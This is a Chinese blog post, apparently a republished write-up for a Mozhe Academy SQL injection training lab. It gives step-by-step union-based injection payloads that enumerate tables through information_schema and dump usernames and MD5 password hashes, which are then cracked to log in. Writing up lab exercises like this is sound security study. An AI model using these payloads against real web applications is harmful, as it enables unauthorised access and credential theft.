当前位置:网站首页>墨者学院SQL注入解题
墨者学院SQL注入解题
2020-11-08 09:40:00 【osc_7bgz0no1】
一·判断注入
输入id=1,正常返回。输入id=-1返回错误。由 此可知存在注入。
二·判断字段
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 此时报错,说明有四个字段
三·使用union查询注入点
输入union select 1,2,3,4
发现2,3为显注点
四·使用database()查库名
输入 union select 1,database(),3,4
查出库名为 mozhe_Discuz_StormGroup
五·查表名
输入
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
查询到StormGroup_member,notice
看见member,所以对第一个产生怀疑。所以首先查询第一个。
六·查询StormGroup_member中的存放的字段
输入
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
查询出id,name,password,status
七·查询密码和用户名
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
得到md5加密后的值。进行解密,得到密码。
如果密码不对,通过limit m,n来继续查询。
八·提交key
得到密码后进行登录可以看见key,复制,提交。
版权声明
本文为[osc_7bgz0no1]所创,转载请带上原文链接,感谢
https://my.oschina.net/u/4415254/blog/4707940
边栏推荐
- Bili Bili common API
- An error occurred while starting the kernel was successfully resolved
- 个人短网址生成平台 自定义域名、开启防红、统计访问量
- 【原创】关于高版本poi autoSizeColumn方法异常的情况
- Deeplight Technology Bluetooth protocol SRRC certification services
- What? Your computer is too bad? You can handle these moves! (win10 optimization tutorial)
- Codeforce算法题 | 你能想出解法,让你的基友少氪金吗?
- python_ scrapy_ Fang Tianxia
- More than 50 object detection datasets from different industries
- 5G+AR出圈,中国移动咪咕成第33届中国电影金鸡奖全程战略合作伙伴
猜你喜欢
Qt混合Python开发技术:Python介绍、混合过程和Demo
Is there a big difference between i5 1135g7 and i51035g1? Which is better?
Improvement of rate limit for laravel8 update
Which is more worth starting with the difference between vivos7e and vivos7
Mate 40 series launch with Huawei sports health service to bring healthy digital life
分布式共识机制
PCR and PTS calculation and inverse operation in TS stream
Review the cloud computing application scenarios you didn't expect (Part 1)
Game mathematical derivation AC code (high precision and low precision multiplication and division comparison) + 60 code (long long) + 20 point code (Full Permutation + deep search DFS)
数据科学面试应关注的6个要点
随机推荐
个人短网址生成平台 自定义域名、开启防红、统计访问量
QT hybrid Python development technology: Python introduction, hybrid process and demo
Visual studio 2015 unresponsive / stopped working problem resolution
Spotify是如何推动数据驱动决策的?
Search and replace of sed
Basic concepts of computer network (5) basic principles of local area network
Littlest jupyterhub| 02 using nbgitpuller to distribute shared files
Unparseable date: 'mon Aug 15 11:24:39 CST 2016', time format conversion exception
NOIP 2012 提高组 复赛 第一天 第二题 国王游戏 game 数学推导 AC代码(高精度 低精度 乘 除 比较)+60代码(long long)+20分代码(全排列+深搜dfs)
狗狗也能操作无人机!你没看错,不过这其实是架自动驾驶无人机 - 知乎
Deeplight Technology Bluetooth protocol SRRC certification services
5g + Ar out of the circle, China Mobile Migu becomes the whole process strategic partner of the 33rd China Film Golden Rooster Award
“智能5G”引领世界,数位智能网优+5G能带来什么?
sed之查找替换
推荐一部经济科普视频,很有价值!
【原创】关于高版本poi autoSizeColumn方法异常的情况
That's what software testing is all about?!
print( 'Hello,NumPy!' )
PCIe 枚举过程
Rust: command line parameter and environment variable operation